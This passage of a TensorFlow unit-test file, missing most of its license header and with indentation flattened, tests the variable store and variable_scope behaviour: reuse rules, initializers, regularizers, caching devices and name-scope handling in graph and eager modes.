# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
import numpy
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.util import compat
from tensorflow.python.util import tf_inspect
def run_inside_wrap_function_in_eager_mode(graph_function):
"""Decorator to execute the same graph code in eager and graph modes.
In graph mode, we just execute the graph_function passed as argument. In eager
mode, we wrap the function using wrap_function and then execute the wrapped
result.
Args:
graph_function: python function containing graph code to be wrapped
Returns:
decorated function
"""
def wrap_and_execute(self):
if context.executing_eagerly():
wrapped = wrap_function.wrap_function(graph_function, [self])
# use the wrapped graph function
wrapped()
else:
# use the original function
graph_function(self)
return wrap_and_execute
class VariableScopeTest(test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEqual(0, len(gc.garbage))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testResource(self):
vs = variable_scope._get_default_variable_store()
v1 = vs.get_variable("v", [1], use_resource=True)
self.assertTrue(isinstance(v1, resource_variable_ops.ResourceVariable))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AttributeError: Tensor.op is meaningless when eager execution is enabled.
def testNameExists(self):
vs = variable_scope._get_default_variable_store()
# No check by default, so we can both create and get existing names.
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
# When reuse is False, we fail when variables are already there.
vs.get_variable("w", [1], reuse=False) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("v", [1], reuse=False) # That fails.
# When reuse is True, we fail when variables are new.
vs.get_variable("v", [1], reuse=True) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("u", [1], reuse=True) # That fails.
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set([v.name for v in vs._vars.values()]))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: "tower0/foo/v/Assign" ... is not an element of
# this graph.
@test_util.run_in_graph_and_eager_modes
def testVarScopeInitializer(self):
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("tower0") as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
with variable_scope.variable_scope(tower, initializer=init):
w = variable_scope.get_variable("w", [])
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with variable_scope.variable_scope("tower1") as tower:
with variable_scope.variable_scope("foo", constraint=constraint):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.constraint, constraint)
with variable_scope.variable_scope(tower, constraint=constraint):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.constraint, constraint)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument <tf.Variable 'string:0' shape=() dtype=string>
# has invalid type <class '...ResourceVariable'>, must be a string or Tensor.
# (Can not convert a ResourceVariable into a Tensor or Operation.)
def testStringDefaultInitializer(self):
with self.cached_session():
v = variable_scope.get_variable("string", shape=[], dtype=dtypes.string)
variables_lib.global_variables_initializer().run()
self.assertAllEqual(compat.as_bytes(self.evaluate(v)), b"")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeDType(self):
with variable_scope.variable_scope("tower2") as tower:
with variable_scope.variable_scope("foo", dtype=dtypes.float16):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, dtypes.float16)
with variable_scope.variable_scope(tower, dtype=dtypes.float16):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, dtypes.float16)
def testGetVariableInGraphNestedUnderEagerContext(self):
with context.eager_mode():
@function.defun
def f():
v = variable_scope.get_variable("should_be_resource", [])
self.assertEqual(type(v), resource_variable_ops.ResourceVariable)
f()
def testEagerVariableStore(self):
with context.eager_mode():
store = variable_scope.EagerVariableStore()
with store.as_default():
v = variable_scope.get_variable("v", shape=(), trainable=True)
w = variable_scope.get_variable("w", shape=(), trainable=False)
self.assertTrue(v in store.variables())
self.assertTrue(w in store.variables())
self.assertTrue(v in store.trainable_variables())
self.assertFalse(w in store.trainable_variables())
self.assertFalse(v in store.non_trainable_variables())
self.assertTrue(w in store.non_trainable_variables())
# Test copying.
new_store = store.copy()
with new_store.as_default():
new_v = variable_scope.get_variable("v")
new_w = variable_scope.get_variable("w")
self.assertEqual(new_v.numpy(), v.numpy())
self.assertEqual(new_w.numpy(), w.numpy())
self.assertTrue(new_v in new_store.variables())
self.assertTrue(new_w in new_store.variables())
self.assertTrue(new_v in new_store.trainable_variables())
self.assertFalse(new_w in new_store.trainable_variables())
self.assertFalse(new_v in new_store.non_trainable_variables())
self.assertTrue(new_w in new_store.non_trainable_variables())
# Check that variables are separate instances.
for v in store.variables():
v.assign(-1)
for v in new_store.variables():
v.assign(1)
for v in store.variables():
self.assertEqual(v.numpy(), -1)
for v in new_store.variables():
self.assertEqual(v.numpy(), 1)
def testEagerVariableStoreWithEagerDefun(self):
with context.eager_mode():
@function.defun
def f():
x = constant_op.constant([[2.0]])
d1 = core_layers.Dense(
1, name="my_dense", kernel_initializer=init_ops.ones_initializer())
_ = d1(x) # create variables
self.assertEqual(len(d1.variables), 2)
v1, v2 = d1.variables
d2 = core_layers.Dense(
1,
name="my_dense",
kernel_initializer=init_ops.ones_initializer(),
_reuse=True)
_ = d2(x)
self.assertEqual(len(d2.variables), 2)
v3, v4 = d2.variables
self.assertAllEqual([v1, v2], [v3, v4])
f()
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_in_graph_and_eager_modes
def testEagerVariablesStoreAddsToCollections(self):
store = variable_scope.EagerVariableStore()
with store.as_default():
trainable = variable_scope.get_variable("v1", [], trainable=True)
not_trainable = variable_scope.get_variable("v2", [], trainable=False)
concat = variable_scope.get_variable(
"v3", [], collections=[ops.GraphKeys.CONCATENATED_VARIABLES])
self.assertEqual(
ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES),
[trainable, not_trainable])
self.assertEqual(
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES),
[trainable, concat])
self.assertEqual(
ops.get_collection(ops.GraphKeys.CONCATENATED_VARIABLES), [concat])
def testEagerVariablesOutsideStoreNotAddedToCollections(self):
with context.eager_mode():
variable_scope.get_variable("v1", [], trainable=True)
variable_scope.get_variable("v2", [], trainable=False)
self.assertFalse(ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
self.assertFalse(ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: "v4/Assign" ... is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testInitFromNonTensorValue(self):
v = variable_scope.get_variable("v4", initializer=4, dtype=dtypes.int32)
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 4)
w = variable_scope.get_variable(
"w4", initializer=numpy.array([1, 2, 3]), dtype=dtypes.int64)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
# A quirk to be revisited?
error = ValueError if context.executing_eagerly() else TypeError
with self.assertRaises(error):
variable_scope.get_variable("x4", initializer={})
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: "xx0/Assign" ...is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testInitFromNonInitializer(self):
# Test various dtypes with zeros initializer as following:
types = [
dtypes.int8, dtypes.uint8, dtypes.int16, dtypes.uint16, dtypes.int32,
dtypes.int64, dtypes.bool
]
# Use different variable_name to distinguish various dtypes
for (i, dtype) in enumerate(types):
x = variable_scope.get_variable(
name="xx%d" % i, shape=(3, 4), dtype=dtype)
y = variable_scope.get_variable(
name="yy%d" % i,
shape=(3, 4),
dtype=dtype,
initializer=init_ops.zeros_initializer(dtype=dtype))
self.evaluate(variables_lib.global_variables_initializer())
self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
# TODO(alive): support variable partitioning/caching in eager mode.
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# InvalidArgumentError: /job:moo/replica:0/task:0/device:CPU:0 unknown device.
def testVarScopeCachingDevice(self):
with self.cached_session():
caching_device = "/job:moo"
with variable_scope.variable_scope("tower"):
with variable_scope.variable_scope(
"caching", caching_device=caching_device):
v = variable_scope.get_variable("v", [])
self.assertTrue(v.value().device.startswith(caching_device))
with variable_scope.variable_scope("child"):
v2 = variable_scope.get_variable("v", [])
self.assertTrue(v2.value().device.startswith(caching_device))
with variable_scope.variable_scope("not_cached", caching_device=""):
v2_not_cached = variable_scope.get_variable("v", [])
self.assertFalse(
v2_not_cached.value().device.startswith(caching_device))
with variable_scope.variable_scope(
"not_cached_identity_device",
caching_device=lambda op: op.device):
v2_identity_device = variable_scope.get_variable("v", [])
self.assertFalse(
v2_identity_device.value().device.startswith(caching_device))
with variable_scope.variable_scope("we_will_do_it_live") as vs_live:
vs_live.set_caching_device("/job:live")
v_live = variable_scope.get_variable("v", [])
self.assertTrue(v_live.value().device.startswith("/job:live"))
v_tower = variable_scope.get_variable("v", [])
self.assertFalse(v_tower.value().device.startswith(caching_device))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: ".../Assign"... is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testVarScopeRegularizer(self):
init = init_ops.constant_initializer(0.3)
def regularizer1(v):
return math_ops.reduce_mean(v) + 0.1
def regularizer2(v):
return math_ops.reduce_mean(v) + 0.2
with variable_scope.variable_scope(
"tower3", regularizer=regularizer1) as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(1, len(losses))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
with variable_scope.variable_scope(tower, initializer=init) as vs:
u = variable_scope.get_variable("u", [])
vs.set_regularizer(regularizer2)
w = variable_scope.get_variable("w", [])
# Next 3 variable not regularized to test disabling regularization.
x = variable_scope.get_variable(
"x", [], regularizer=variable_scope.no_regularizer)
with variable_scope.variable_scope(
"baz", regularizer=variable_scope.no_regularizer):
y = variable_scope.get_variable("y", [])
vs.set_regularizer(variable_scope.no_regularizer)
z = variable_scope.get_variable("z", [])
# Check results.
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses))
self.evaluate(variables_lib.variables_initializer([u, w, x, y, z]))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
self.assertAllClose(self.evaluate(losses[1]), 0.4)
self.assertAllClose(self.evaluate(losses[2]), 0.5)
with variable_scope.variable_scope("foo", reuse=True):
# reuse=True is for now only supported when eager execution is disabled.
if not context.executing_eagerly():
v = variable_scope.get_variable("v",
[]) # "v" is already there, reused
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses)) # No new loss added.
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Tensor-typed variable initializers must either be wrapped in an
# init_scope or callable...
@test_util.run_in_graph_and_eager_modes
def testInitializeFromValue(self):
init = constant_op.constant(0.1)
w = variable_scope.get_variable("v", initializer=init)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.1)
with self.assertRaisesRegexp(ValueError, "shape"):
# We disallow explicit shape specification when initializer is constant.
variable_scope.get_variable("u", [1], initializer=init)
with variable_scope.variable_scope("foo", initializer=init):
# Constant initializer can be passed through scopes if needed.
v = variable_scope.get_variable("v")
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.1)
# Check that non-float32 initializer creates a non-float32 variable.
init = constant_op.constant(1, dtype=dtypes.int32)
t = variable_scope.get_variable("t", initializer=init)
self.assertEqual(t.dtype.base_dtype, dtypes.int32)
# Raise error if `initializer` dtype and `dtype` are not identical.
with self.assertRaisesRegexp(ValueError, "don't match"):
variable_scope.get_variable("s", initializer=init, dtype=dtypes.float64)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument <tf.Variable 'v0:0' shape=(1,) dtype=float32> has
# invalid type <class '...ops.resource_variable_ops.ResourceVariable'>, must
# be a string or Tensor. (Can not convert a ResourceVariable into a Tensor or
# Operation.)
def testControlDeps(self):
with self.cached_session() as sess:
v0 = variable_scope.get_variable(
"v0", [1], initializer=init_ops.constant_initializer(0))
with ops.control_dependencies([v0.value()]):
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
add = v1 + v0
# v0 should be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
# We should be able to initialize and run v1 without initializing
# v0, even if the variable was created with a control dep on v0.
sess.run(v1.initializer)
self.assertEqual(1, sess.run(v1))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(add)
# If we initialize v0 we should be able to run 'add'.
sess.run(v0.initializer)
sess.run(add)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AssertionError: True is not false (last assertFalse)
def testEnableResourceVariables(self):
old = variable_scope._DEFAULT_USE_RESOURCE
try:
variable_scope.enable_resource_variables()
self.assertTrue(isinstance(variables_lib.VariableV1(1.0),
resource_variable_ops.ResourceVariable))
variable_scope.disable_resource_variables()
self.assertFalse(isinstance(variables_lib.VariableV1(1.0),
resource_variable_ops.ResourceVariable))
finally:
variable_scope._DEFAULT_USE_RESOURCE = old
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument None has invalid type <type 'NoneType'>
def testControlFlow(self):
with self.cached_session() as sess:
v0 = variable_scope.get_variable(
"v0", [], initializer=init_ops.constant_initializer(0))
var_dict = {}
# Call get_variable in each of the cond clauses.
def var_in_then_clause():
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
var_dict["v1"] = v1
return v1 + v0
def var_in_else_clause():
v2 = variable_scope.get_variable(
"v2", [1], initializer=init_ops.constant_initializer(2))
var_dict["v2"] = v2
return v2 + v0
add = control_flow_ops.cond(
math_ops.less(v0, 10), var_in_then_clause, var_in_else_clause)
v1 = var_dict["v1"]
v2 = var_dict["v2"]
# We should be able to initialize and run v1 and v2 without initializing
# v0, even if the variable was created with a control dep on v0.
sess.run(v1.initializer)
self.assertEqual([1], sess.run(v1))
sess.run(v2.initializer)
self.assertEqual([2], sess.run(v2))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
# We should not be able to run 'add' yet.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(add)
# If we initialize v0 we should be able to run 'add'.
sess.run(v0.initializer)
sess.run(add)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: ".../Assign"... is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testGetVariableScope(self):
# Test the get_variable_scope() function and setting properties of result.
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("bar"):
new_init1 = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init1, None)
# Check that we can set initializer like this.
variable_scope.get_variable_scope().set_initializer(init)
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
if not context.executing_eagerly():
# Check that we can set reuse.
variable_scope.get_variable_scope().reuse_variables()
with self.assertRaises(ValueError): # Fail, w does not exist yet.
variable_scope.get_variable("w", [1])
# Check that the set initializer goes away.
new_init = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init, None)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScope(self):
with variable_scope.variable_scope("tower4") as tower:
self.assertEqual(tower.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower4/scope/")
with variable_scope.variable_scope("tower5"):
with variable_scope.variable_scope("bar") as bar:
self.assertEqual(bar.name, "tower5/bar")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower5/bar/scope/")
with variable_scope.variable_scope("tower6"):
with variable_scope.variable_scope(tower, reuse=True) as tower_shared:
self.assertEqual(tower_shared.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower6/tower4/scope/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNameScope(self):
with ops.name_scope("testVarScopeNameScope1"):
with variable_scope.variable_scope("tower") as tower:
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(
tower): # Re-entering acts like another "tower".
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_1/scope2/")
with variable_scope.variable_scope(
"tower"): # Re-entering by string acts the same.
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_2/scope2/")
with ops.name_scope("testVarScopeNameScope2"):
with variable_scope.variable_scope("tower"):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(tower):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower_1/scope2/")
root_var_scope = variable_scope.get_variable_scope()
with ops.name_scope("testVarScopeNameScope3"):
with variable_scope.variable_scope(root_var_scope):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope3/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOriginalNameScope(self):
with self.cached_session():
with ops.name_scope("scope1"):
with variable_scope.variable_scope("tower") as tower:
self.assertEqual(tower.original_name_scope, "scope1/tower/")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "scope1/tower/scope2/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower) as tower1:
# Re-entering preserves original name scope.
self.assertEqual(tower1.original_name_scope, "scope1/tower/")
with ops.name_scope("foo") as sc2:
self.assertEqual(sc2, "scope2/tower/foo/")
# Test re-entering original name scope.
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower):
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar_1/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeObjectReuse(self):
with self.cached_session():
vs = None
with variable_scope.variable_scope("jump", reuse=True) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertTrue(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertTrue(jump_no_reuse.reuse) # Inherited, cannot be undone.
with variable_scope.variable_scope("jump", reuse=False) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertFalse(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertFalse(jump_no_reuse.reuse)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuse(self):
with self.cached_session():
def test_value(value):
x = constant_op.constant(value)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = state_ops.assign(variable_scope.get_variable("var", []), x)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = variable_scope.get_variable("var", [])
self.assertEqual(value, x.eval())
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AttributeError: Tensor.op is meaningless when eager execution is enabled.
def testVarOpScope(self):
with self.cached_session():
with ops.name_scope("testVarOpScope1"):
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "tower/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower/testVarOpScope2/")
with variable_scope.variable_scope("tower", "default", []):
with self.assertRaises(ValueError):
variable_scope.get_variable("w", [])
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower_1/testVarOpScope2/")
with ops.name_scope("testVarOpScope2"):
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default/testVarOpScope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default_1/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default_1/testVarOpScope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
with self.cached_session():
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_2/layer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesWithJump(self):
with self.cached_session():
with variable_scope.variable_scope("default") as default:
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/layer/w:0")
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"default/layer_1/w:0")
with variable_scope.variable_scope(default):
pass
# No matter the jump in the middle, unique numbering continues.
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"default/layer_2/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuse(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True) as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AttributeError: Tensor.op is meaningless when eager execution is enabled.
def testVarScopeGetVar(self):
with self.cached_session():
with variable_scope.variable_scope("root"):
with variable_scope.variable_scope("towerA") as tower_a:
va = variable_scope.get_variable("v", [1])
self.assertEqual(va.name, "root/towerA/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("towerB"):
vb = variable_scope.get_variable("v", [1])
self.assertEqual(vb.name, "root/towerB/v:0")
with self.assertRaises(ValueError):
with variable_scope.variable_scope("towerA"):
va2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("towerA", reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("foo"):
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "root/foo/bar/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va3 = variable_scope.get_variable("v", [1])
self.assertEqual(va, va3)
with self.assertRaises(ValueError):
with variable_scope.variable_scope(tower_a, reuse=True):
with variable_scope.variable_scope("baz"):
variable_scope.get_variable("v", [1])
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [2]) # Different shape.
self.assertEqual("shape" in str(exc.exception), True)
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [1], dtype=dtypes.int32)
self.assertEqual("dtype" in str(exc.exception), True)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestedOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer_1/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default_1/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseParam(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer) as outer:
with variable_scope.variable_scope("tower", "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
outer.reuse_variables()
